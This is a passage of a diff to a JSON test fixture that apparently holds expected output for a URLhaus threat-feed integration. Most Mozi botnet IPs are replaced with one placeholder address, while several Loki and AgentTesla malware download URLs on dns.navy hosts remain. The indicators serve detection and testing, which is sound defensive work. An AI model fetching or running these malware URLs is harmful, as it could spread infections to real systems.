listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029161Z", + "original": "{\"id\":\"960932\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960932/\",\"url\":\"http://89.160.20.156:52221/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -29966,18 +29966,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://125.44.251.66:58493/Mozi.m", + "original": "http://89.160.20.156:58493/Mozi.m", "scheme": "http", "port": 58493, - "domain": "125.44.251.66", - "full": "http://125.44.251.66:58493/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:58493/Mozi.m" }, - "ip": "125.44.251.66" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694825768Z", - "original": "{\"id\":\"960931\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960931/\",\"url\":\"http://125.44.251.66:58493/Mozi.m\",\"url_status\":\"online\",\"host\":\"125.44.251.66\",\"date_added\":\"2021-01-14 15:50:40 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029167900Z", + "original": "{\"id\":\"960931\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960931/\",\"url\":\"http://89.160.20.156:58493/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:50:40 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -30015,18 +30015,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.222.174.88:57603/Mozi.m", + "original": "http://89.160.20.156:57603/Mozi.m", "scheme": "http", "port": 57603, - "domain": "117.222.174.88", - "full": "http://117.222.174.88:57603/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:57603/Mozi.m" }, - "ip": "117.222.174.88" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694829665Z", - "original": "{\"id\":\"960930\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960930/\",\"url\":\"http://117.222.174.88:57603/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.222.174.88\",\"date_added\":\"2021-01-14 15:50:14 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029174500Z", + "original": "{\"id\":\"960930\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960930/\",\"url\":\"http://89.160.20.156:57603/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:50:14 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -30064,18 +30064,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.202.70.238:45439/Mozi.m", + "original": "http://89.160.20.156:45439/Mozi.m", "scheme": "http", "port": 45439, - "domain": "117.202.70.238", - "full": "http://117.202.70.238:45439/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:45439/Mozi.m" }, - "ip": "117.202.70.238" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694833683Z", - "original": "{\"id\":\"960929\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960929/\",\"url\":\"http://117.202.70.238:45439/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.202.70.238\",\"date_added\":\"2021-01-14 15:50:13 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029181100Z", + "original": "{\"id\":\"960929\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960929/\",\"url\":\"http://89.160.20.156:45439/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:50:13 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -30113,18 +30113,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.222.163.220:58291/Mozi.m", + "original": "http://89.160.20.156:58291/Mozi.m", "scheme": "http", "port": 58291, - "domain": "117.222.163.220", - "full": "http://117.222.163.220:58291/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:58291/Mozi.m" }, - "ip": "117.222.163.220" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694837680Z", - "original": "{\"id\":\"960928\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960928/\",\"url\":\"http://117.222.163.220:58291/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.222.163.220\",\"date_added\":\"2021-01-14 15:50:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029187700Z", + "original": "{\"id\":\"960928\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960928/\",\"url\":\"http://89.160.20.156:58291/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:50:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -30162,18 +30162,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.251.18.157:52785/Mozi.m", + "original": "http://89.160.20.156:52785/Mozi.m", "scheme": "http", "port": 52785, - "domain": "117.251.18.157", - "full": "http://117.251.18.157:52785/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:52785/Mozi.m" }, - "ip": "117.251.18.157" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694841818Z", - "original": "{\"id\":\"960927\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960927/\",\"url\":\"http://117.251.18.157:52785/Mozi.m\",\"url_status\":\"online\",\"host\":\"117.251.18.157\",\"date_added\":\"2021-01-14 15:50:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029194400Z", + "original": "{\"id\":\"960927\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960927/\",\"url\":\"http://89.160.20.156:52785/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:50:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -30211,18 +30211,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://123.9.198.150:38582/Mozi.m", + "original": "http://89.160.20.156:38582/Mozi.m", "scheme": "http", "port": 38582, - "domain": "123.9.198.150", - "full": "http://123.9.198.150:38582/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:38582/Mozi.m" }, - "ip": "123.9.198.150" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694845976Z", - "original": "{\"id\":\"960924\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960924/\",\"url\":\"http://123.9.198.150:38582/Mozi.m\",\"url_status\":\"online\",\"host\":\"123.9.198.150\",\"date_added\":\"2021-01-14 15:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029201100Z", + "original": "{\"id\":\"960924\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960924/\",\"url\":\"http://89.160.20.156:38582/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -30260,18 +30260,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://125.46.164.249:39503/Mozi.m", + "original": "http://89.160.20.156:39503/Mozi.m", "scheme": "http", "port": 39503, - "domain": "125.46.164.249", - "full": "http://125.46.164.249:39503/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:39503/Mozi.m" }, - "ip": "125.46.164.249" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694850204Z", - "original": "{\"id\":\"960925\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960925/\",\"url\":\"http://125.46.164.249:39503/Mozi.m\",\"url_status\":\"online\",\"host\":\"125.46.164.249\",\"date_added\":\"2021-01-14 15:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029207700Z", + "original": "{\"id\":\"960925\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960925/\",\"url\":\"http://89.160.20.156:39503/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -30309,18 +30309,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://123.14.32.234:53018/Mozi.m", + "original": "http://89.160.20.156:53018/Mozi.m", "scheme": "http", "port": 53018, - "domain": "123.14.32.234", - "full": "http://123.14.32.234:53018/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:53018/Mozi.m" }, - "ip": "123.14.32.234" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694853991Z", - "original": "{\"id\":\"960926\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960926/\",\"url\":\"http://123.14.32.234:53018/Mozi.m\",\"url_status\":\"online\",\"host\":\"123.14.32.234\",\"date_added\":\"2021-01-14 15:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029214300Z", + "original": "{\"id\":\"960926\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960926/\",\"url\":\"http://89.160.20.156:53018/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -30358,18 +30358,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://123.5.7.214:40698/Mozi.m", + "original": "http://89.160.20.156:40698/Mozi.m", "scheme": "http", "port": 40698, - "domain": "123.5.7.214", - "full": "http://123.5.7.214:40698/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:40698/Mozi.m" }, - "ip": "123.5.7.214" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694857908Z", - "original": "{\"id\":\"960923\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960923/\",\"url\":\"http://123.5.7.214:40698/Mozi.m\",\"url_status\":\"online\",\"host\":\"123.5.7.214\",\"date_added\":\"2021-01-14 15:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029220900Z", + "original": "{\"id\":\"960923\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960923/\",\"url\":\"http://89.160.20.156:40698/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -30407,18 +30407,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://116.24.57.201:50060/Mozi.m", + "original": "http://89.160.20.156:50060/Mozi.m", "scheme": "http", "port": 50060, - "domain": "116.24.57.201", - "full": "http://116.24.57.201:50060/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50060/Mozi.m" }, - "ip": "116.24.57.201" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694861906Z", - "original": "{\"id\":\"960922\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960922/\",\"url\":\"http://116.24.57.201:50060/Mozi.m\",\"url_status\":\"online\",\"host\":\"116.24.57.201\",\"date_added\":\"2021-01-14 15:49:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029227400Z", + "original": "{\"id\":\"960922\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960922/\",\"url\":\"http://89.160.20.156:50060/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:49:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -30456,18 +30456,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.48.21.16:47874/Mozi.m", + "original": "http://89.160.20.156:47874/Mozi.m", "scheme": "http", "port": 47874, - "domain": "115.48.21.16", - "full": "http://115.48.21.16:47874/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:47874/Mozi.m" }, - "ip": "115.48.21.16" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694865963Z", - "original": "{\"id\":\"960921\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960921/\",\"url\":\"http://115.48.21.16:47874/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.48.21.16\",\"date_added\":\"2021-01-14 15:49:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029234100Z", + "original": "{\"id\":\"960921\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960921/\",\"url\":\"http://89.160.20.156:47874/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:49:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -30514,7 +30514,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.694869811Z", + "ingested": "2021-12-13T08:40:08.029240700Z", "original": "{\"id\":\"960919\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960919/\",\"url\":\"http://perezluzwsdycafeyzmn.dns.navy/perdoc/regasm.exe\",\"url_status\":\"online\",\"host\":\"perezluzwsdycafeyzmn.dns.navy\",\"date_added\":\"2021-01-14 15:46:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"listed\"},\"reporter\":\"abuse_ch\",\"larted\":\"true\",\"tags\":[\"exe\",\"Loki\",\"opendir\"]}", "category": "threat", "type": "indicator", 
@@ -30554,18 +30554,18 @@ "url": { "path": "/bin.sh", "extension": "sh", - "original": "http://59.58.148.90:33799/bin.sh", + "original": "http://89.160.20.156:33799/bin.sh", "scheme": "http", "port": 33799, - "domain": "59.58.148.90", - "full": "http://59.58.148.90:33799/bin.sh" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:33799/bin.sh" }, - "ip": "59.58.148.90" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694873628Z", - "original": "{\"id\":\"960920\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960920/\",\"url\":\"http://59.58.148.90:33799/bin.sh\",\"url_status\":\"online\",\"host\":\"59.58.148.90\",\"date_added\":\"2021-01-14 15:46:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", + "ingested": "2021-12-13T08:40:08.029247200Z", + "original": "{\"id\":\"960920\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960920/\",\"url\":\"http://89.160.20.156:33799/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:46:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -30611,7 +30611,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.694877585Z", + "ingested": "2021-12-13T08:40:08.029253900Z", "original": "{\"id\":\"960918\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960918/\",\"url\":\"http://kalamikwsdyonlinedws.dns.navy/kaladoc/vbc.exe\",\"url_status\":\"online\",\"host\":\"kalamikwsdyonlinedws.dns.navy\",\"date_added\":\"2021-01-14 15:45:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"listed\"},\"reporter\":\"abuse_ch\",\"larted\":\"true\",\"tags\":[\"AgentTesla\",\"exe\"]}", "category": "threat", "type": "indicator", 
@@ -30650,17 +30650,17 @@ "url": { "path": "/js/js/lokkk.jpg", "extension": "jpg", - "original": "http://54.224.10.186/js/js/lokkk.jpg", + "original": "http://89.160.20.156/js/js/lokkk.jpg", "scheme": "http", - "domain": "54.224.10.186", - "full": "http://54.224.10.186/js/js/lokkk.jpg" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/js/js/lokkk.jpg" }, - "ip": "54.224.10.186" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694881462Z", - "original": "{\"id\":\"960917\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960917/\",\"url\":\"http://54.224.10.186/js/js/lokkk.jpg\",\"url_status\":\"online\",\"host\":\"54.224.10.186\",\"date_added\":\"2021-01-14 15:45:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"abuse_ch\",\"larted\":\"true\",\"tags\":[\"exe\",\"Loki\"]}", + "ingested": "2021-12-13T08:40:08.029260500Z", + "original": "{\"id\":\"960917\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960917/\",\"url\":\"http://89.160.20.156/js/js/lokkk.jpg\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:45:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"abuse_ch\",\"larted\":\"true\",\"tags\":[\"exe\",\"Loki\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -30698,18 +30698,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://59.99.141.110:33201/Mozi.a", + "original": "http://89.160.20.156:33201/Mozi.a", "scheme": "http", "port": 33201, - "domain": "59.99.141.110", - "full": "http://59.99.141.110:33201/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:33201/Mozi.a" }, - "ip": "59.99.141.110" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694885380Z", - "original": "{\"id\":\"960916\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960916/\",\"url\":\"http://59.99.141.110:33201/Mozi.a\",\"url_status\":\"offline\",\"host\":\"59.99.141.110\",\"date_added\":\"2021-01-14 15:38:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029267200Z", + "original": "{\"id\":\"960916\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960916/\",\"url\":\"http://89.160.20.156:33201/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:38:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -30747,18 +30747,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.99.136.138:53926/Mozi.m", + "original": "http://89.160.20.156:53926/Mozi.m", "scheme": "http", "port": 53926, - "domain": "59.99.136.138", - "full": "http://59.99.136.138:53926/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:53926/Mozi.m" }, - "ip": "59.99.136.138" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694889287Z", - "original": "{\"id\":\"960914\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960914/\",\"url\":\"http://59.99.136.138:53926/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.99.136.138\",\"date_added\":\"2021-01-14 15:38:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029273800Z", + "original": "{\"id\":\"960914\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960914/\",\"url\":\"http://89.160.20.156:53926/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:38:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -30796,18 +30796,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://61.245.159.55:43917/Mozi.m", + "original": "http://89.160.20.156:43917/Mozi.m", "scheme": "http", "port": 43917, - "domain": "61.245.159.55", - "full": "http://61.245.159.55:43917/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:43917/Mozi.m" }, - "ip": "61.245.159.55" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694893395Z", - "original": "{\"id\":\"960915\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960915/\",\"url\":\"http://61.245.159.55:43917/Mozi.m\",\"url_status\":\"online\",\"host\":\"61.245.159.55\",\"date_added\":\"2021-01-14 15:38:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029280400Z", + "original": "{\"id\":\"960915\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960915/\",\"url\":\"http://89.160.20.156:43917/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:38:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -30845,18 +30845,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.99.43.122:42053/Mozi.m", + "original": "http://89.160.20.156:42053/Mozi.m", "scheme": "http", "port": 42053, - "domain": "59.99.43.122", - "full": "http://59.99.43.122:42053/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:42053/Mozi.m" }, - "ip": "59.99.43.122" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694897322Z", - "original": "{\"id\":\"960911\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960911/\",\"url\":\"http://59.99.43.122:42053/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.99.43.122\",\"date_added\":\"2021-01-14 15:38:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029287Z", + "original": "{\"id\":\"960911\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960911/\",\"url\":\"http://89.160.20.156:42053/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:38:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
